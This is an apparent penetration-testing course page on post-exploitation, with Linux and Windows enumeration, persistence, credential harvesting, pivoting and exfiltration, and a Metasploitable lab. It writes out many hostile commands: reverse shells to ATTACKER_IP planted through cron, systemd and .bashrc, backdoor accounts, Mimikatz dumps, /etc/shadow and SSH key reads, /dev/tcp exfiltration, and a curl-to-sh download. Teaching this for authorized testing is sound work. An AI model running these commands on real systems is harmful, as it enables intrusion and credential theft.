CSY202 Week 08 Intermediate

Practice post-exploitation workflows before moving to reading resources.

Applied Cryptography

Track your progress through this week's content

Opening Framing: After the Initial Shell

You've exploited a vulnerability and gained a shell. Now what? Initial access is rarely the end goal. Post-exploitation is where you demonstrate the real impact of a compromise—accessing sensitive data, moving to critical systems, and showing what an attacker could actually accomplish.

Post-exploitation includes situational awareness (understanding where you are), persistence (maintaining access), credential harvesting, data exfiltration, and pivoting to other systems.

This week covers what to do after gaining initial access: enumeration, maintaining access, and expanding your foothold in the network.

Key insight: Initial access proves a vulnerability exists. Post-exploitation proves business impact.

1) Situational Awareness

First step after compromise: understand your environment: 

Immediate Questions:

- Who am I? (what user/privileges)
- Where am I? (what system)
- What's here? (files, data, connections)
- What else is connected? (network, other systems)
- How did I get here? (document for report)
- How do I stay? (persistence options)

Linux Enumeration: 

# Identity
whoami
id
hostname
uname -a

# System info
cat /etc/os-release
cat /etc/issue
cat /proc/version

# Users
cat /etc/passwd
cat /etc/shadow  # if readable
cat /etc/group
who
w
last

# Network
ifconfig / ip addr
route / ip route
netstat -tulpn
ss -tulpn
cat /etc/hosts
cat /etc/resolv.conf

# Processes
ps aux
ps aux | grep root
top

# Interesting files
find / -perm -4000 2>/dev/null  # SUID
find / -perm -2000 2>/dev/null  # SGID
find / -writable -type d 2>/dev/null
find / -name "*.txt" -o -name "*.conf" 2>/dev/null

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l

# Installed software
dpkg -l  # Debian/Ubuntu
rpm -qa  # RHEL/CentOS

Windows Enumeration: 

# Identity
whoami
whoami /all
whoami /priv
hostname

# System info
systeminfo
wmic os get caption,version

# Users
net user
net user administrator
net localgroup administrators
net group /domain  # if domain-joined

# Network
ipconfig /all
route print
netstat -ano
arp -a

# Processes
tasklist
tasklist /svc
wmic process list brief

# Installed software
wmic product get name,version

# Interesting files
dir /s /b *.txt *.doc* *.xls* *.config
findstr /si password *.txt *.xml *.config

# Scheduled tasks
schtasks /query /fo LIST /v

# Services
sc query
wmic service get name,pathname

Automated Enumeration Scripts: 

# Linux
# LinPEAS - comprehensive enumeration
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh

# Linux Smart Enumeration
./lse.sh -l 1

# Windows
# WinPEAS
.\winPEASany.exe

# PowerUp (privilege escalation)
. .\PowerUp.ps1
Invoke-AllChecks

# Seatbelt
.\Seatbelt.exe -group=all

Key insight: Thorough enumeration reveals the next steps. Skip this phase and you'll miss opportunities.

2) Maintaining Access (Persistence)

Ensure you don't lose access if the system reboots or your shell dies: 

Persistence Goals:

1. Survive system reboots
2. Survive user logouts
3. Multiple backup access methods
4. Avoid detection (in real attacks)

Note: In authorized testing, document but
don't always implement persistent backdoors.
Some clients prohibit this.

Linux Persistence Techniques: 

# SSH authorized keys (if you have write access)
echo "your_public_key" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

# Cron job
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root

# Systemd service (as root)
cat > /etc/systemd/system/backdoor.service << EOF
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor

# .bashrc / .profile (user login trigger)
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> ~/.bashrc

# Create new user
useradd -m -s /bin/bash backdoor
echo "backdoor:password123" | chpasswd
usermod -aG sudo backdoor

Windows Persistence Techniques: 

# Registry Run keys
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

# Scheduled task
schtasks /create /sc onlogon /tn "Updater" /tr "C:\backdoor.exe"

# Create new user
net user backdoor Password123! /add
net localgroup administrators backdoor /add

# Service (as admin)
sc create backdoor binPath= "C:\backdoor.exe" start= auto

# WMI event subscription (advanced)
# Triggers on events like logon

# Startup folder
copy backdoor.exe "C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"

Meterpreter Persistence: 

# Meterpreter persistence module
meterpreter > run persistence -h
meterpreter > run persistence -U -i 10 -p 4444 -r ATTACKER_IP

# -U: Run at user login
# -X: Run at system startup
# -i: Reconnect interval (seconds)
# -p: Port
# -r: Attacker IP

# Or use exploit/windows/local/persistence
use exploit/windows/local/persistence
set SESSION 1
set STARTUP SYSTEM
run

Key insight: Persistence in pentests proves an attacker could maintain long-term access. Document techniques; don't always deploy them.

3) Credential Harvesting

Collecting credentials enables lateral movement: 

Credential Locations:

Linux:
- /etc/shadow (password hashes)
- ~/.ssh/ (SSH keys)
- ~/.bash_history (typed passwords)
- Config files (database creds, API keys)
- Memory (active sessions)

Windows:
- SAM database (local hashes)
- LSASS memory (plaintext/hashes)
- Credential Manager
- Browser stored passwords
- Registry (service accounts)
- Memory (active sessions)

Linux Credential Harvesting: 

# Password hashes
cat /etc/shadow

# SSH keys
cat ~/.ssh/id_rsa
cat ~/.ssh/id_ed25519

# History files (may contain passwords)
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.psql_history

# Config files
grep -r "password" /etc/ 2>/dev/null
grep -r "password" /var/www/ 2>/dev/null
grep -r "pass" ~/.* 2>/dev/null

# Database configs
cat /var/www/html/wp-config.php
cat /var/www/html/config.php

# Memory (requires tools)
# Dump process memory for passwords

Windows Credential Harvesting: 

# Mimikatz (king of credential theft)
mimikatz.exe
> privilege::debug
> sekurlsa::logonpasswords   # Dump all credentials
> sekurlsa::wdigest          # Plaintext passwords
> lsadump::sam               # SAM database
> lsadump::secrets           # LSA secrets
> vault::cred                # Credential Manager

# Meterpreter
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets

# Hashdump
meterpreter > hashdump

# Saved credentials
cmdkey /list
vaultcmd /list

# Browser passwords (various tools)
# LaZagne
python laZagne.py all

# Registry secrets
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# Extract offline with secretsdump

Credential Files to Search: 

# Common credential locations:

Web configs:
- web.config (ASP.NET)
- wp-config.php (WordPress)
- config.php, settings.php
- .env files

Scripts and code:
- *.ps1, *.bat, *.sh
- *.py, *.rb, *.pl

Documents:
- passwords.txt, passwords.xlsx
- credentials.*, logins.*

Infrastructure:
- unattend.xml (Windows install)
- sysprep.inf
- Group Policy Preferences (GPP)

Cloud:
- .aws/credentials
- .azure/
- .gcloud/

Key insight: Harvested credentials often provide access to more valuable systems than the one you initially compromised.

4) Pivoting and Lateral Movement

Using compromised systems to reach others: 

Pivoting Concepts:

Pivoting:
- Using compromised host to access other networks
- Reach systems your attacker machine can't directly access
- Compromised host becomes a "jump box"

Lateral Movement:
- Moving from one compromised host to another
- Usually within same network
- Using harvested credentials

Network Discovery from Compromised Host: 

# Linux
ip addr                    # Your interfaces
ip route                   # Routing table
arp -a                     # ARP cache (nearby hosts)
cat /etc/hosts
cat /etc/resolv.conf       # DNS servers
netstat -tulpn             # Connections

# Quick network scan (if nmap available)
nmap -sn 192.168.2.0/24

# Ping sweep without nmap
for i in {1..254}; do ping -c 1 192.168.2.$i | grep "bytes from" & done

# Windows
ipconfig /all
route print
arp -a
netstat -ano
net view                   # Network shares
net view /domain           # Domain systems

SSH Tunneling: 

# Local port forwarding
# Access remote_host:80 through compromised_host
ssh -L 8080:remote_host:80 user@compromised_host
# Now browse to localhost:8080

# Dynamic port forwarding (SOCKS proxy)
ssh -D 9050 user@compromised_host
# Configure browser/tools to use SOCKS proxy localhost:9050
# Use proxychains:
proxychains nmap -sT 192.168.2.0/24

# Remote port forwarding
# Make your local port accessible via compromised host
ssh -R 4444:localhost:4444 user@compromised_host

Metasploit Pivoting: 

# Add route through meterpreter session
meterpreter > run autoroute -s 192.168.2.0/24

# Or manually
msf6 > use post/multi/manage/autoroute
msf6 > set SESSION 1
msf6 > set SUBNET 192.168.2.0
msf6 > run

# Check routes
msf6 > route print

# Now scan through pivot
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 192.168.2.0/24
msf6 > set PORTS 22,80,445
msf6 > run

# SOCKS proxy for external tools
msf6 > use auxiliary/server/socks_proxy
msf6 > run
# Use proxychains with localhost:1080

Lateral Movement Techniques: 

# With captured credentials:

# PSExec (Windows)
psexec.py domain/user:password@target
psexec.py domain/user@target -hashes :NTLM_HASH

# WMI
wmiexec.py domain/user:password@target

# WinRM
evil-winrm -i target -u user -p password

# SMB
smbexec.py domain/user:password@target

# RDP
xfreerdp /v:target /u:user /p:password

# SSH (Linux)
ssh user@target

# Pass-the-Hash (don't need password)
crackmapexec smb target -u user -H NTLM_HASH
pth-winexe -U domain/user%hash //target cmd.exe

Key insight: Networks are interconnected. One compromised system often leads to many more through pivoting and reused credentials.

5) Data Exfiltration

Demonstrating access to sensitive data: 

Exfiltration in Pentests:

Goals:
- Prove access to sensitive data
- Demonstrate business impact
- Document what an attacker could steal

Important:
- Don't actually exfiltrate real sensitive data
- Take screenshots as evidence
- Document file names/locations
- Small sample is enough to prove impact

Finding Sensitive Data: 

# Linux
find / -name "*.conf" 2>/dev/null
find / -name "*.db" 2>/dev/null
find / -name "*.sql" 2>/dev/null
find /home -name "*.txt" 2>/dev/null
find / -name "id_rsa" 2>/dev/null

# Windows
dir /s /b C:\*.doc* C:\*.xls* C:\*.pdf
findstr /si password *.txt *.xml *.config
dir /s /b "C:\Users\*password*"

# Common sensitive locations:
# - Database files
# - Backup files
# - Configuration files
# - User documents
# - Email stores
# - Source code

Data Transfer Methods: 

# HTTP (attacker runs server)
# On attacker:
python3 -m http.server 8080

# On target (download):
wget http://ATTACKER_IP:8080/file
curl http://ATTACKER_IP:8080/file -o file

# Upload to attacker:
# Attacker: nc -lvnp 9999 > file
# Target: cat file > /dev/tcp/ATTACKER_IP/9999

# SCP/SFTP
scp file user@attacker:/path/
sftp user@attacker

# SMB (Windows)
copy file \\ATTACKER_IP\share\

# Base64 (for small files)
base64 file > encoded.txt
# Copy text, decode on attacker

# Meterpreter
meterpreter > download file
meterpreter > download -r directory

Covering Tracks: 

# In real attacks, attackers cover tracks
# In pentests, document what you do instead

# Linux log locations:
/var/log/auth.log
/var/log/syslog
/var/log/messages
~/.bash_history

# Windows logs:
Event Viewer
Security log
Application log

# For pentests:
- Document your activities
- Timestamp your actions
- Keep notes for report
- Don't delete logs (document that you could)

Key insight: Data exfiltration proves business impact. In reports, documenting access to sensitive data is more impactful than just showing shell access.

Real-World Context: Post-Exploitation Ethics

Professional considerations in post-exploitation:

Scope Creep: Post-exploitation can quickly expand beyond initial scope. A pivoted network may contain out-of-scope systems. Always verify before continuing.

Data Handling: You may encounter real sensitive data—PII, financial records, health information. Handle it appropriately: document access, don't exfiltrate, don't read more than necessary.

System Stability: Some post-exploitation tools can crash systems. Be cautious with credential dumping tools on production systems.

MITRE ATT&CK Mapping:

  • T1003 - OS Credential Dumping: Mimikatz, hashdump
  • T1021 - Remote Services: Lateral movement
  • T1041 - Exfiltration Over C2: Data theft
  • T1053 - Scheduled Task: Persistence

Key insight: Post-exploitation demonstrates real-world impact but requires careful attention to scope and ethics.

Guided Lab: Post-Exploitation Practice

Practice post-exploitation on a compromised Metasploitable system.

Step 1: Get Initial Access

# Use any method from previous weeks
# Example: vsftpd backdoor
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS [metasploitable-ip]
exploit

Step 2: Situational Awareness

# Gather information
whoami
id
uname -a
cat /etc/passwd
cat /etc/shadow
ifconfig
netstat -tulpn
ps aux

Step 3: Credential Harvesting

# Collect hashes
cat /etc/shadow > /tmp/shadow.txt

# Search for credentials
grep -r "password" /var/www/ 2>/dev/null
cat ~/.bash_history

# Check for SSH keys
find /home -name "id_rsa" 2>/dev/null

Step 4: Find Sensitive Data

# Look for interesting files
find / -name "*.conf" 2>/dev/null | head -20
find /home -name "*.txt" 2>/dev/null
find /var/www -name "config*" 2>/dev/null

# Database credentials
cat /var/www/*/config*.php 2>/dev/null

Step 5: Network Discovery

# What else is on the network?
arp -a
cat /etc/hosts
netstat -tulpn

Reflection (mandatory)

  1. What was the most sensitive data you found?
  2. What credentials could enable further access?
  3. How would you document this for a pentest report?
  4. What persistence mechanisms would work on this system?

Week 8 Outcome Check

By the end of this week, you should be able to:

Next week: Privilege Escalation—going from low-privilege access to system administrator.

🎯 Hands-On Labs (Free & Essential)

Practice post-exploitation workflows before moving to reading resources.

🎮 TryHackMe: Post-Exploitation

What you'll do: Enumerate a compromised host and document impact.
Why it matters: Post-exploitation proves business risk, not just access.
Time estimate: 2-3 hours

Start TryHackMe Post-Exploitation →

🎮 TryHackMe: Linux Privilege Escalation

What you'll do: Enumerate Linux hosts and escalate privileges safely.
Why it matters: Post-exploitation often requires escalating rights.
Time estimate: 2-3 hours

Start TryHackMe Linux PrivEsc →

🏁 PicoCTF Practice: Forensics (Post-Access Artifacts)

What you'll do: Extract artifacts and evidence to simulate data discovery.
Why it matters: Demonstrating impact requires clear evidence handling.
Time estimate: 1-2 hours

Start PicoCTF Forensics →

🛡️ Lab: Timing Attack Demo

What you'll do: Measure response time differences in a mock auth endpoint.
Deliverable: Script + short write-up on observed timing leakage.
Why it matters: Timing differences can reveal secrets without brute force.
Time estimate: 60-90 minutes

💡 Lab Tip: Document every credential and path you touch for clean reporting.

🛡️ Timing Attacks & Side-Channel Leakage

Side-channels are subtle but powerful. Attackers can recover secrets from timing differences and error behavior. 

Watch for:
- Early-exit comparisons
- Different response sizes
- Cache or branch timing differences
- Verbose error messages

📚 Building on CSY101 Week-13: Threat model auth flows for side-channel exposure.

Resources

Complete the required resources to build your foundation.

Lab: Complete Post-Exploitation Exercise

Goal: Demonstrate full post-exploitation workflow from initial shell to business impact.

Part 1: Initial Enumeration

  1. Gain shell on Metasploitable
  2. Perform complete system enumeration
  3. Document all users, services, and network information

Part 2: Credential Gathering

  1. Extract password hashes
  2. Search for hardcoded credentials
  3. Check history files
  4. Document all credentials found

Part 3: Sensitive Data Discovery

  1. Locate database files
  2. Find configuration files with secrets
  3. Identify interesting user files
  4. Screenshot or document sensitive findings

Part 4: Persistence Planning

  1. Identify 3 viable persistence mechanisms
  2. Document how each would be implemented
  3. (Optional) Implement one in your lab

Part 5: Impact Report

  1. Summarize business impact of compromise
  2. What could an attacker do with this access?
  3. What sensitive data is at risk?

Deliverable (submit):

Checkpoint Questions

  1. What information should you gather immediately after gaining access?
  2. What is the difference between pivoting and lateral movement?
  3. What tool is commonly used for Windows credential harvesting?
  4. Why is persistence important in penetration testing?
  5. How would you set up an SSH tunnel for pivoting?
  6. What ethical considerations apply to data exfiltration in pentests?

Week 08 Quiz

Test your understanding of post-exploitation enumeration, persistence, and pivoting.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz

Weekly Reflection

Reflection Prompt (200-300 words):

This week you learned post-exploitation—the phase where initial access becomes meaningful compromise. You gathered credentials, found sensitive data, and explored lateral movement.

Reflect on these questions:

A strong reflection will consider technical, organizational, and ethical dimensions of post-exploitation.

Verified Resources & Videos

Post-exploitation transforms a single shell into demonstrated organizational impact. The skills you've learned—enumeration, credential harvesting, pivoting—are what real attackers use. Understanding them makes you effective at both attack and defense. Next week: privilege escalation to gain even more access.

← Previous: Week 07 Next: Week 09 →